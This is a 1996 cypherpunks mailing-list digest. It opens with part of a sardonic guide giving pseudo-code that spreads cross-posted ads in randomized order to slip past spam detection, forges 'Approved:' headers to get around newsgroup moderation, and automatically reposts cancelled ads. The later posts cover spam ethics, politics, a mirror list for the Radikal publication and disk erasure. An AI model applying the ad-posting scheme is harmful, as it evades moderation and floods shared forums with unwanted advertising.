]intricacies of RFC 1036, you can ask a friendly techie to help implement these ]algorithms in a computer programming language, such as PERL. For example, the ]headers of your ad should contain the header "Approved: " to assure ]proper propagation in the so-called "moderated" newsgroups, but the techniques ]for inserting it are outside the scope of this article. ] ]Certain self-appointed "net-judges" keep trying to suppress the public ]dissemination of knowledge on how Usenet works (available from RFC 1036 and ]other publicly accessible documents). They rely on "security through obscurity" ]to protect their economic interests and harass honest Usenet entrepreneurs so ]as to keep the advertising pie all to themselves. Hence the need for anonymity. ] ]Q-1. Can I post a separate copy of my ad into each target newsgroup in ]the alphabetical order? ] ]No! That would be "spamming". ] ]Spamming is commonly defined as excessive posting of multiple, separate copies ]of identical messages to many newsgroups, one right after the other, without ]using the standard method of cross-posting, described in this article. Since ]it's really not that difficult to write a program that will post the same ]advertisement to dozens, if not hundreds of thousands of newsgroups, a lot of ]people have taken to doing this. People usually spam as a means of flooding ]Usenet with messages about a product or service that they want to sell, ]although they can spam for other reasons. Spamming Usenet is a BAD THING to do. ]DON'T DO IT. Follow the instructions in this article to advertise WITHOUT spam. ] ]Consider the old-fashioned way of spamming Usenet with ads. Let G be the list ]of all the relevant newsgroups where you want to post your ad. Let NG be the ]number of such newsgroups. We will refer to individual newsgroups as G[0] ]through G[NG-1]. ] ]Remember once and for all: it's a very bad idea to run the equivalent of: ] ]for i=0 to NG-1 step 1 do (1) ] post ad to G[i]; ] ]This is SPAM. You can do better than that. But what happens if you just spam? ] ]First, some self-appointed net.cops, "vigilantes", or "net judges" will get ]upset if you post into every newsgroup in alphabetical order. Naturally, you ]couldn't care less if you hurt their feelings, but some of these vigilantes ]might go as far as impersonate you and "forge" a control article, making it ]look like you yourself are asking every computer on the network to delete your ]ad! This is illegal, but happens all too often. ] ]It is a major waste of Usenet resources to post your ad to one newsgroup at a ]time, without cross-posting. Please don't do it. On the other hand, if your ]"Newsgroups:" header is too long, it may break some Usenet newsreaders. Let NC ]be the number of newsgroups you will cross-post to at one time. Make sure your ]NC is never greater than 20, or else the self-appointed net.cops or "judges" ]will call your ad "velveeta" (spread into too many newsgroups) and forge ]cancels for it. In the pseudo-code below NC actually varies between 8 and 12. ]Section Q-2 explains what to do when NG is greater than NC. ] ]Second, some of the newsgroups on your list may have poor propagation. When you ]post your ad to them, they won't reach every other site on Usenet unless you ]cross-post the same ad to better propagated groups. After you've composed the ]list of newsgroups into which you want to post your announcement, separate them ]into two lists: the well-propagated newsgroups known at every site (like ]"sci.important.announce") and the poorly propagated ones (like "ca.spam.misc"). ]Let NW be the number of well-propagated groups. Let NP be the number of poorly ]propagated groups. You'll probably have them listed in alphabetical order, but ]we'll see how to fix that. Let R be the integer part of NP/NW. You will cross- ]post to one newsgroup from the P list for every R newsgroups from the W list. ] ]Now you are going to go through the lists W and P and make sure that you cover ]each newsgroup. If you pick newsgroups from G at random, you will definitely ]miss a few and hit a few more than once. That would be a waste of Usenet ]resources, which you want to avoid. Instead, let SW be a random number ]relatively prime to NW. Recal Euclid's algorithm for computing the greatest ]common divisor of two integers m, n, such that n>m: ] ]do { ] g=m; ] m=n%m; ] n=g; ] } while (m); ] ]We now rewrite loop (1) as: ] ]i=SW; (2) ]do { ] post ad to G[i]; ] i=(i+SW) % NW; /* where % denotes the remainder */ ] } while (i!=SW); ] ]Note: the remainder is denoted "mod" in some computer programming languages. ] ]It is easy to see that this loop will cover every newsgroup in G exactly once, ]but not in any kind of alphabetical order. However you still want to cross-post ]your ad to both the W list and the P list. Here is the complete pseudo-code: ] ]/* choose the step for loop (2) */ ]let SW=NW/3+random(NW/3) /* random number betweem NW/3 and 2*NW/3 */ ]while (GCD(SW,NW)<>1) ++SW; /* relatively prime to NW */ ] ]let SP=NP/3+random(NP/3) /* likewise, random number betweem NP/3 and 2*NP/3 */ ]while (GCD(SP,NP)<>1) ++SP; ] ]done=false; ]NR=0; /* when it reaches R, we take a newsgroup from the P list */ ]i=j=0; /* control variables for the loops on W and P */ ]do { ] L=""; /* random number of groups to cross-post to */ ] for (NC=8+random(5); NC>0; --NC) { ] if (NR say something like <123buy-my-widgets at your.site>. ]Make sure all message-ids are distinct and "legal". ] ]Ability to revive articles for which someone else has forged a cancel. ] ]Suppose you have posted article A1..An with message-id's M1..Mn. ]Save this information in a database. On a fast computer you could use ]PERL's associate list, with ]Mi's used as an index and Ai's being the info you've fed to NNTP, including ]article'b body and the relevant headers, like the list of newsgroups it was ]posted to. ] ]Now have a program monitor your control newsgroup and whenever it sees ]an incoming article with a "Control: M" header, check if M is equal to some Mi ]in your associate list. If it is, then: ] ] * Generate a new message-id, M'i. ] ] * Repost Ai with message-id M'i, adding the header "Supersedes: Mi" ] ] * Replace M' by M'i in your associate list. ] ]As an added touch, you can automatically add a little blurb to the reposted ]article providing header information about the forged cancel to which you're ]reacting. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Sat Sep 14 10:50:32 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 01:50:32 +0800 Subject: EGO_war Message-ID: <199609141524.PAA09661@pipe1.t1.usa.pipeline.com> 9-13-96. FiTi: "On manoeuvres in the modern military mind." The most interesting challenge is psychological. Participants learn the hard way that they cannot simply command. They must persuade, cajole and win over subordinates, allies and politicians, who may have varying agendas. While lower level command requires physical courage and speed of decision, higher commmand involves moral courage, intellectual vision and perseverance. "Politicians are being pressed by interest groups on all sides, while the military will usually only focus on their aspect of the task. The collision of those two sets of values can be quite a shock." The more subtle message from the historians is the lethal potential of petty jealousies, warring ambitions and clashing egos. ----- http://jya.com/egowar.txt (16 kb) EGO_war From rah at shipwright.com Sat Sep 14 11:21:44 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 15 Sep 1996 02:21:44 +0800 Subject: ISC Meeting Agenda Message-ID: --- begin forwarded text Date: Sat, 14 Sep 1996 08:53:40 -0400 (EDT) From: Michael S Baum To: www-buyinfo at allegra.att.com Subject: ISC Meeting Agenda Mime-Version: 1.0 ========================================================== MEETING NOTICE ========================================================== Please correspond with: Michael S. Baum, Esq. 33 Tremont Street Cambridge, MA 02139-1227 USA V: +1 617.661.1234 F: +1 617.661.0716 E: michael at verisign.com Subject: INFORMATION SECURITY COMMITTEE MEETING NOTICE Dear Committee Member: You are cordially invited to participate in a meeting of the Information Security Committee, Section of Science & Technology, American Bar Association, on Friday/Saturday, October 18-19, 1996, in Boston. The Committee will advance its development of commercial key escrow guidelines as well as consider digital signature legislative initiatives in the several States and other jurisdictions, and continue its consideration of digital signature evidence and liability. Consistent with Section policy, ISC meeting participants MUST be members of both the ABA and the ABA Section of Science and Technology. Please contact Ann Kowalsky, Manager Section of Science & Technology, at ABA offices in Chicago by phone: +1 312.988.5599, fax: +1 312.988.5628, or email: sciencetech at attmail.com for membership information. It is possible to become a paid member of the ABA and the ISC at the meeting. Dan Greenwood, ISC member, has kindly agreed to host the meeting at the Information Technology Division of the Commonwealth of Massachusetts. Dan can be reached at 617.973.0071 or DGreenwood at state.ma.us for directions & logistical information. Meeting details appear below. I look forward to seeing you in Boston. Sincerely, Michael S. Baum Chair, Information Security Committee Section of Science & Technology, ABA --------------- INFORMATION SECURITY COMMITTEE October 18-19, 1996 Tentative Agenda (see "Meeting Details," next page) (In extended sessions, breaks will be taken as needed.) October 18, 1996 Friday 8:30-9:00 Greetings, breakfast, administrative matters. 9:00-9:30 Introductions, meeting logistics, Guidelines update, questions; PKI-relevant standards reports. 9:30-12:00 Legislative/Regulatory Update (including open conference call with digital signature leg./reg. drafting committee representatives in the US and abroad). 12:00-13:00 Joint lunch with Boston Bar Assn, Computer Law Committee. 13:00-18:00 Continuation of legislative/regulatory update with digital signature leg./reg. drafting committee representatives. 18:00-???? Watering hole discussions; possible continuation of work group meetings. October 19, 1996 Saturday 8:30-9:00 Breakfast, et cetera. 9:00-10:00 Presentation by Key Escrow work group. 10:00-12:00 Breakout sessions on work groups. 12:00-13:00 Working lunch and guest presentation on "Assuring Quality and the Accreditation of Certification Authorities" by invited representative of the Nat'l Inst. of Standards and Tech. 13:00-15:00 Presentations by Work Groups. 15:00-15:30 Path Forward; wrap-up. ISC MEETING DETAILS October 18-19, 1996 Members are urged to participate in one of the work groups that will be presenting/meeting during the ISC's meeting. "Addendum" Work Group Contact: Ruven Schwartz (rschwart at research.westlaw.com) Tom Smedinghoff (tsmed at mbc.com) Joe Wackerman (jwackerm at email.usps.gov) The Addendum Work Group will continue drafting a digital signature trading partner agreement -- integrating the principles of the Digital Signature Guidelines, and developing additional practical commentary for this model form of electronic commerce agreement. Evidentiary Work Group Contact: Stan Kurzban (qbjw99a at prodigy.com) or Serge Parisien (parisise at droit.umontreal.ca) The Evidentiary Work Group will complete and present a provisional outline for a tutorial on the evidentiary implications of digitally signed information and advance drafting of material for each section of the tutorial. Key Escrow Work Group (KEWG) Contact: Dwight Olson (73522.3542 at compuserve.com) or Randy Sabett (rsabett at venable.com) The KEWG will focus on the legal and technical aspects of commercial key escrow. The group will seek to accurately explore all major issues surrounding this topic, and produce a set of draft guidelines for comment. The proposed guidelines are intended to facilitate secure electronic commerce by clarifying the rights and obligations of the parties involved in voluntary commercial key escrow. The work product may take one or more forms including: (i) a "restatement" of the relevant law and practice, (ii) a model state or federal law or international convention, (iii) a set of principles that can be incorporated by reference into agreements or used for the interpretation of legal aspects of voluntary key escrow, or (iv) a set of "gap filler" provisions. Liability Work Group Contact: Maureen Adamache (rmadama at magi.com) The liability work group will meet as necessary to discuss the apportionment of liabilities among PKI providers and users. Previously, this task was considered in the ISC's own work-product, the Digital Signature Guidelines. Future documents that will be considered include Certification Practice Statements, and digital signature legislative and regulatory work product. State Government Digital Signatures Laws & Regulations Contact: Dan Greenwood (DGreenwood at state.ma.us) The digital signature legislative and regulatory working group will compile, evaluate and compare the various emerging approaches by states and other jurisdictions. Work product will include a web-based comprehensive "one-stop shop" for jurisdictions wishing to review current approaches. First-time participants (who plan to attend the October 18-19, 1996 meeting) must request attendance and submit a brief work-product (typically 3-5 pages) relevant to the subject matter. Please contact Ruven Schwartz (v: 612.687.8095, f: 612.687.7907, or e: rschwart at research.westlaw.com) for details. Meeting Location: McCormack Building (Across Bowdoin Street from the State House) 1 Ashburton Place Room 1, 21st Floor Boston, Massachusetts USA (Contact: Dan Greenwood +1 617.973.0071) Meals: The cafeteria will be available for lunch on Friday for those ISC Members who choose to work through the joint lunch session. On Saturday we will probably order in pizza. Lodging: A very nearby hotel is the Holiday Inn, Government Center, 5 Blossom Street, Boston. The regular rate during our meeting dates is $219.95/night. However, the Reservation Supervisor (Kim) has offered a rate of $199.95 to Committee members who request the "Great Rate" plan. Call reservations at +1 617.742.7630. For a better (but more expensive) hotel near Government Center, try the Parker House at +1 617.227.8600. The Omni Parker House (nicer than Holiday Inn) quoted a rate of $169/night for a single with a king or queen bed and $119/night for a single with a double bed. The rooms are very small - but the hotel is nice. See also a Greater Boston Bed & Breakfast directory: http://www.inovatec.com/bb/resservc/GREATER/GREATER.htm. RSVP: Please confirm your intention to participate to Ann Kowalsky, Section Manager, Section of Science and Technology (sciencetech at attmail.com) as soon as possible. See you in Boston! =========================================================================== --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From AwakenToMe at aol.com Sat Sep 14 11:53:00 1996 From: AwakenToMe at aol.com (AwakenToMe at aol.com) Date: Sun, 15 Sep 1996 02:53:00 +0800 Subject: unwanted mail..what can I do? Message-ID: <960914123556_284798391@emout14.mail.aol.com> In a message dated 96-09-14 01:18:49 EDT, dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes: << AwakenToMe at aol.com writes: > I recieved mail from netfree.com.. > I tried mailing it back (it def. had a forged address, but I got the netfree > from the mail header.....) > So anyway..... I tried sending to root at netfree....my mail was rejected (not > unknown ...it was rejected by the system) said it wasnt authorized... so I > tried support at netfree...same thing. > It ISSSSS rather annoying...any sugestions? Yes, a bunch of them: 1. Get a life. Learn to delete unwanted e-mail. Get a real shell account. 2. Ask AOL to let its users decide what e-mail to reject automatically (like procmail). They've been promising this capability by the end of September. Then you can set up your account to get no more e-mail from netfree. >> Typical asshole response. I must thank chuck at nova..etc. for his TRULY helpful response. But you........get a real shell account?? I do thank you. netcom and a school system. I can delete unwanted mail. But maybe I LIKE to yell at people who spam me. And ive never received mail from netfree before..nor since... thats NOT my problem. Learn to comprehend what pthers write. I wanted to know what I can do about getting in coontact with them. It is in my opinion not right to forge email addresses...people dont do it when the send me us postal mail From jya at pipeline.com Sat Sep 14 11:53:48 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 02:53:48 +0800 Subject: MTH_ead Message-ID: <199609141641.QAA11110@pipe4.t2.usa.pipeline.com> 9-14-96. WaPo: "Empty-Head Network Fails to Link TWA Crash to Terrorism." The frantic overseas intelligence-gathering effort, which has included eavesdropping, use of informants and offers of large cash payments for leads, has been undertaken by the CIA, the NSA and the DEA, as well as a number of foreign investigative agencies. The NRO has analyzed voluminous archives of intelligence drawn from spy satellites, intercepted phone calls and electronic eavesdrops gathered before the crash. Since right after the TWA crash, the NSA started monitoring phone conversations of people believed to have ties to terrorists groups, as well as trying to track the movements of suspected terrorists. The CIA, working through its sources, has been offering money for leads on any kind of terrorist role. The DEA has been using overseas agents to gather intelligence; the FBI liaisons stationed in 23 countries are working to gather intelligence on the crash; and Scotland Yard and the Mossad are also empty-handed (not Red-handed -- yet). ----- http://jya.com/mthead.txt (10 kb) MTH_ead From admin at superhot.com Sat Sep 14 13:03:56 1996 From: admin at superhot.com (Admin) Date: Sun, 15 Sep 1996 04:03:56 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Art] Message-ID: <199609141737.LAA05928@rintintin.Colorado.EDU> At 09:53 PM 9/13/96 -0700, you wrote: >>>At 21:50 9/11/96, Ross Wright wrote to >>>cypherpunks at toad.com and remailer-operators at c2.org: >>>>As I said having a website invites comments. It's like being a >>>>public figure. In effect you are publishing your e-mail address. >>> >>> >>>Interesting perspective. However, placing an email address on a web page >>>is by no means an offer to take "comments" (i.e., marketing spams) on >>>anything that strikes the spammer's fancy. >> >>How would you know what the *intent* of these other people is in placing >>mailme: tags on their public pages unless you have been to the specific >>pages. You speak only for yourself, yet you try to imply that you speak for >>everyone on the www who has placed a mailto: tag on their pages. >> > >I think this is exactly the point. On a given page I might have several >mailto tags. One for comments on some subject, one for feedback, and one >for the webmaster. I expect the person mailing me to take the time to use >the correct mailbox. I created a page urging political activism, and >included a mailto for all the relevant Senators and Representatives. I >hardly think they are interested in this kind of spam. Of course, that would be for THEM to decide what they find interesting or not. Every response to this thread always seems to impart some speculation as to what other people might or might not find interesting. What one finds of interest another may not so why don't we leave it up to the recipients themselves instead of some self appointed censors. I'll decide whats interesting to me, you decide what is interesting to you, and the senators can decide whats interesting to them. I'm sure that some senators/reps on the various endowment for the arts committees, and or the technology oversight committees would have found HipCrime's sight to be of some interest. Of course if it was a blurb of some new mixmaster/remailer development, you would have found it of interest, so lets stop trying to guess what other people want and speak for ourselves. > >Trawling the web for every address you can find, then mailing them all >seems very inappropriate. To you it may not seem appropriate, as its a subjective judgement, I'm sure that some brown-shirted jack-booted gov't officials beleive that using a remailer for any reason is inappropriate....thats what's great about this world, we all have our own subjective beliefs. admin > > -Lance > >---------------------------------------------------------- >Lance Cottrell loki at obscura.com >PGP 2.6 key available by finger or server. >Mixmaster, the next generation remailer, is now available! >http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com > >"Love is a snowmobile racing across the tundra. Suddenly >it flips over, pinning you underneath. At night the ice >weasels come." > --Nietzsche >---------------------------------------------------------- > > > <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From asgaard at Cor.sos.sll.se Sat Sep 14 14:23:57 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Sun, 15 Sep 1996 05:23:57 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Timothy C. May wrote: >The 70% already _are_ cutting the throats of the other 30%. It's called a >60%+ tax rate. This is the sum of: federal income tax, state income tax, Most of these taxes are not used for feeding the poor but to support the Nomenclatura of the Bureaucracy and we all want to get rid of that. The beauty of a simple tax on production of goods for transfer to a few necessary institutions is it's simplicity - no need for millions of clerks to implement the System like now. And the Basic_Needs_Refund should, as I suggested, be payed to ALL citizens, for ease of administration. The idea of production tax, as opposed to the present system of income tax, has been investigated by economic theorists for years and some of them believe in it. I can't go into details because my knowledge is lacking and my interest in the academic subject of economy is moderate, but such taxation seems to fit with crypto-anarchy in that physical goods in any but the most insignificant scale can't be hidden by cryptography. And I rather pay some taxes (but optimally much less than now) then have my throat literally cut by a revolting 'mob of servants'. >The masses have realized, as De Tocqueville predicted 150 years ago, that >they can use the democratic process to pick the pockets of others. This is >why I have no faith in "democracy," and consider crypto anarchy to be the >best way to undermine this flawed system. I agree with most of this. As some kind of an anarchist (but not a pure anarcho-capitalist) I can of course not accept the basic rule of democracy: that a majority (big or slight) should be able to decide for the minority; or decide for the individual in any but the most obvious ways (imprisoning killers and thieves etc). But I believe that most people really want to work to some extent, to be part of the economic process and gain a standing above the minimal one - hence there is no danger in a Basic-Feed-Refund system. >Cf. what sociologists call "the demographic transition." Countries that >value learning and wealth are _not_ facing a population problem. In fact, >many such countries are now at "below replacement" birth levels. And that's good. The world population really should go back to around 1 billion for achieving a stabile ecology (with singing birds for the peace of minds). The former (?) US system of encouraging young standalone women to make babies to get benefits was very bad. The Chinese system - less benefits the more children you have - is the way to go. >poor of today are receiving this. Ask a peasant of, say, 18th century >Europe if he'd consider himself sheltered and fed if he could have an >apartment in a building, a microwave oven, a television, a MacDonald's >nearby, and enough extra spending money for some beer. That's about exactly what I see as a minimal standard. The microwave oven is the cheapest of ovens. Untaxed beer is the cheapest of drugs. The television could go, though (but it will never do so in the present system - it's needed for indoctrination). >(The point being that people want more than "basic food and shelter," but >are often unwilling to make the commitments and sacrifices in their lives >to gain the wherewithal to earn significant salaries.) This is where we disagree. The real lazy ones are satisfied with a roof over there heads, a microwave oven for cooking pizza, a six-pack and a soap opera. Most people really do want to achieve something more in their lives. >There is a basic error here, one that I see often. Who says that the >"anarcho-capitalists" will freely give away, say, some vast fraction of >their profits so as to subsidize the overall society? Any more so than the Not a vast portion, if the above_basics capitalistic economy blooms. Probably 10% would suffice - what was once paid to the church, the institution that traditionally has supported the ill and poor. The problem with the 100% market economy approach is what to do with those who just can't get it together, i.e. who buy beer for the money that should go to health insurance and then fall ill. It's against basic human instincts to just let them stay in agony. A system with only voluntary charities might possibly become enough when we have reached the resemblence of an ecology-balanced singularity, but this is not the historical time for suddenly ending ALL welfare - in a situation with unemployment (not accepting making maids and servants of those loosing their jobs) mainly due to robotics. >And crypto anarchy means it will not be clear who is making what, who is >generating what income, and where it is located. And the producers of >wealth will be able to move accounts, resources, and even factories around It will always be comparatively easy to locate production plants and farms, and tax them 10% of their production, without even caring who owns them. This would call for a minimum of government clerks. Crypto anarchy will inhibit taxation of all other kinds of businesses, speculations and information transfers - the great bulk of the present economy. >Ask your fellow Swedes about the drain of talent out of Sweden in the 60s >and 70s...the flight of Bergmann, actors and actresses, corporations, and >even ABBA. (Though I understand most of ABBA moved back to Sweden and is >now chummy with the Queen.) This is a myth. I don't have to ask, I was there! I was happy to get rid of Bergman, a much overrated director of boring movies. That actors and actresses left for Hollywood is not surprising, that's where the real movies are made (good and 'bad'). The Swedish film industry - heavily subsidized with tax money! - is mostly producing boring movies, with people just talking, that only intellectual snobs pretend to like. The country is to small for the accumulation of high-risk investment capital that real movies need nowadays. The likes of ABBA's and Bjorn Borg (a tennis player who got very rich) move to tax-friendly places like Monaco, invest their millions and then come back to live off their accumulated wealth. Nothing wrong with that. Had there been crypto anarchy already in the investment markets they could have stayed all along, of course, but who cares about where they live. And since you mentioned the Queen of Sweden (born in South America, of suspicious post WWII German descent): she is presently the front celebrity for the anti-pedophile movement here - after being shown some kiddie-porn at an 'official' demonstration. Seriously... The big Swedish corporations (Volvo, Eriksson, ASEA etc) have not moved out of the country. Why should they? Swedish wages and taxes are not very different from anywhere else in the Western World. Asgaard From tank at xs4all.nl Sat Sep 14 14:26:18 1996 From: tank at xs4all.nl (tank) Date: Sun, 15 Sep 1996 05:26:18 +0800 Subject: radikal mirrors as of 14-9-1996 Message-ID: <199609141855.UAA07141@xs2.xs4all.nl> ** Radikal Mirrors ** ************************************************ Receive Radikal 154 by email: Send a empty message to radikal at xs4all.nl and you receive issue 154 by mail. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Read the radikal by calling the netherlands (25 numbers). All telefonnr. are listed at the end of this mail. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Download the radikal archive: http: radikal.tar.gz Radikal-site unix archive radi.zip Radikal-site dos-zip archive ftp: ftp://utopia.hacktic.nl/pub/replay/pub/incoming Radikal 154 in plaintext ASCII http://www.xs4all.nl/~tank/radikal/radi154.tgz Radikal 154 unix http://www.xs4all.nl/~tank/radikal/radi154.zip Radikal 154 dos-zip If you got your mirror up and running let us know +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Special mirror: de.soc.zensur de.org.politik.spd http://www.altavista.digital.com usenet-search for radikal.zip +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Mirror-sites: ============= 1.http://burn.ucsd.edu/%7Eats/RADIKAL/ 2.http://www.jca.or.jp/~taratta/mirror/radikal/ 3.http://www.serve.com/~spg/ 4.http://huizen.dds.nl/~radikal 5.http://www.canucksoup.net/radikal/index.html 6.http://www.ecn.org/radikal 7.http://www.well.com/~declan/mirrors/ 8.http://www.connix.com/~harry/radikal/index.htm 9.http://www.ganesa.com/radikal/ 10.http://www.denhaag.org/~radikal 11.http://www.knooppunt.be/~daniel/radikal 12.http://emma.unm.edu/radikal 13.http://www.tacacs.com/radikal/" 14.http://www.dsvenlo.nl/~vvd/radikal/ 15.http://www.why.net/home/static/radi 16.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 17.http://www.xs4all.nl/~jeroenw/radikal/ 18.http://home.ipr.nl/~radikal/ 19.http://www.dreamy.demon.co.uk/occam/ 20.http://www.ibmpcug.co.uk/~irdial/live_free/ 21.http://zero.tolerance.org/radi/index.htm 22.http://www.meaning.com/library/radikal/ 23.http://www.xs4all.nl/~irmed/radikal/ 24.http://www.walli.uwasa.fi/~tviemero/radikal 25.http://www.sko.it/~sfede/radi/index.htm 26.http://www.bart.nl/~sz/index.html 27.http://bellp.med.yale.edu/index.htm 28.http://www.euronet.nl/users/funest/radi/index.htm 29.http://fine.com/radikal 30.http://www.lab.net/radikal 31.http://www.charm.net/~gbarren/radikal 32.http://login.datashopper.dk/~pethern/radikal/ Phone: Call and login as "new". So first dail the international number +31 (hollands international code) and than one of these numbers. Amsterdam Zoetermeer Maarssen 020 5350535, V.34 079 3611011, V.34 0346 550455, V.34 020 4223422, UUCP 079 3600800, ISDN PPP 0346 553613, ISDN PPP 020 6265060, ZyXEL 079 3630569, ISDN X.75 0346 555285, ISDN X.75 020 4229700, ISDN PPP 020 4206782, ISDN X.75 Hoorn Geleen Leeuwarden 0229 212177, V.34 046 4789478, V.34 058 2157815, V.34 0229 219717, ISDN PPP 046 4230555, ISDN PPP 058 2130910, ISDN PPP Goes Assen 0113 252900, V.34 0592 331531, V.34 0113 270110, ISDN PPP 0592 331278, ISDN PPP Willemstad Deurne 0168 472472, V.34 0493 323344, V.34 0168 476472, ISDN PPP 0493 351566, ISDN PPP From admin at superhot.com Sat Sep 14 14:33:25 1996 From: admin at superhot.com (Admin) Date: Sun, 15 Sep 1996 05:33:25 +0800 Subject: Exactly the point Lance... [Fwd: HipCrime and Art] Message-ID: <199609141912.NAA13899@rintintin.Colorado.EDU> At 11:30 AM 9/14/96 -0700, you wrote: >>At 09:53 PM 9/13/96 -0700, you wrote: >>>>>At 21:50 9/11/96, Ross Wright wrote to >>>>>cypherpunks at toad.com and remailer-operators at c2.org: >>>>>>As I said having a website invites comments. It's like being a >>>>>>public figure. In effect you are publishing your e-mail address. >>>>> >>>>> >>>>>Interesting perspective. However, placing an email address on a web page >>>>>is by no means an offer to take "comments" (i.e., marketing spams) on >>>>>anything that strikes the spammer's fancy. >>>> >>>>How would you know what the *intent* of these other people is in placing >>>>mailme: tags on their public pages unless you have been to the specific >>>>pages. You speak only for yourself, yet you try to imply that you speak for >>>>everyone on the www who has placed a mailto: tag on their pages. >>>> >>> >>>I think this is exactly the point. On a given page I might have several >>>mailto tags. One for comments on some subject, one for feedback, and one >>>for the webmaster. I expect the person mailing me to take the time to use >>>the correct mailbox. I created a page urging political activism, and >>>included a mailto for all the relevant Senators and Representatives. I >>>hardly think they are interested in this kind of spam. >> >>Of course, that would be for THEM to decide what they find interesting or >>not. Every response to this thread always seems to impart some speculation >>as to what other people might or might not find interesting. What one finds >>of interest another may not so why don't we leave it up to the recipients >>themselves instead of some self appointed censors. I'll decide whats >>interesting to me, you decide what is interesting to you, and the senators >>can decide whats interesting to them. >> >>I'm sure that some senators/reps on the various endowment for the arts >>committees, and or the technology oversight committees would have found >>HipCrime's sight to be of some interest. Of course if it was a blurb of some >>new mixmaster/remailer development, you would have found it of interest, so >>lets stop trying to guess what other people want and speak for ourselves. >> >>> >>>Trawling the web for every address you can find, then mailing them all >>>seems very inappropriate. >> >>To you it may not seem appropriate, as its a subjective judgement, I'm sure >>that some brown-shirted jack-booted gov't officials beleive that using a >>remailer for any reason is inappropriate....thats what's great about this >>world, we all have our own subjective beliefs. >> >>admin > >Allow me to make this more concrete. I don't want see any of this fucking >shit in my mailbox just because I have a mailto link on my Mixmaster page. >Is that sufficiently clear? Exactly the point, bingo! The point is this, exactly what do YOU define as *fucking shit* so that anyone who visits your page will know exactly what they can and can't say to Lance Cottrell. We've determined that you don't want to receive the HipCrime URL from your mailto: button. What about the next visitor who comes across your page, how will they know exactly what you do or do not find interesting? Will you put a lengthy *what I expect from all correspondents who use my mailto: button* explanation on the page? Perhaps a simple, *don't mail me unless I already know you and want to hear what you have to say...* tag? admin > -Lance > >---------------------------------------------------------- >Lance Cottrell loki at obscura.com >PGP 2.6 key available by finger or server. >Mixmaster, the next generation remailer, is now available! >http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com > >"Love is a snowmobile racing across the tundra. Suddenly >it flips over, pinning you underneath. At night the ice >weasels come." > --Nietzsche >---------------------------------------------------------- > > > From varange at crl.com Sat Sep 14 14:49:24 1996 From: varange at crl.com (Troy Varange) Date: Sun, 15 Sep 1996 05:49:24 +0800 Subject: The HipCrime [NOISE] Message-ID: <199609141949.AA05431@crl8.crl.com> Who cares? The rebuttals by the Hipmeister sound like he's pretty cool. So fuck off, net-cops. From frantz at netcom.com Sat Sep 14 15:56:53 1996 From: frantz at netcom.com (Bill Frantz) Date: Sun, 15 Sep 1996 06:56:53 +0800 Subject: Erasing Disks Message-ID: <199609142059.NAA13108@netcom8.netcom.com> N.B. Your disagreement is with Peter's paper, not me unless I have inadvertently misrepresented what he wrote. At 2:15 AM 9/14/96 -0700, Bill Stewart wrote: >I disagree. The methods for declassification in the Army and >Defense Department security manuals included several approaches: >1) Physical destruction - acid, sandblasters, etc. >2) NSA-Approved Whopping Big Magnets I think Peter was looking for non-destructive methods which would allow continued use of the hard disk >3) NSA-Approved Hopefully-Bugfree computer programs for some computers. > >The most secure methods were the unclassified ones - after we >sandblasted our RM05 disk packs, the NSA and KGB can't read anything. >The less secure methods are the ones that require NSA approval - >how strong is a Whopping Big Magnet this year? (Too strong to put >near MY computer lab, thank you! :-) Peter thinks this strength is to strong for practical application. He describes someone who had a strong enough research magnet which bent the platters. Since erasing the clocking tracks requires them to be rewritten at the factory, magnets do not allow reuse of hard disks. >But shredding the floppy? No need to classify that, no secrets leaked Burn after shredding, or you have a puzzle fan reassembling the shredded disk. Hastily, but with regards - Bill ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From hallam at ai.mit.edu Sat Sep 14 16:02:59 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Sun, 15 Sep 1996 07:02:59 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <51amo5$p01@life.ai.mit.edu> Message-ID: <323B1926.5656@ai.mit.edu> Perry E. Metzger wrote: > > Hallam-Baker writes: > > Pity you guys missed out on the idea of trades unions and think that > > employment is some kind of serfdom in which you loose all your > > rights the day you sign up. If you hadn't sold your government to > > the cooprorations a while back you might have got out of the middle > > ages. > > Yes, we could be a workers paradise like one of those lovely European > countries with double digit unemployment and all. Too bad we didn't go > in for democratic socialism while we could have, eh? Perry, hate to burst your bubble but unemployment in the UK _trippled_ in the first eighteen months of rule by that great socialist Margret Thatcher. One third of UK manufaturing industry went bankrupt in the only large scale application of Freedman's ideas. The UK only began to recover after the monetarist policies were consigned to the dustbin. Unemployment remained high despite a sustained attack on workers rights. The scenario you described is an unjust one but it would be equally unjust if the company was bought out and the new owner decided to sack all black people and people called "Perry". You were the one who brought up the issue of fairness. Phill From dlv at bwalk.dm.com Sat Sep 14 18:00:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 15 Sep 1996 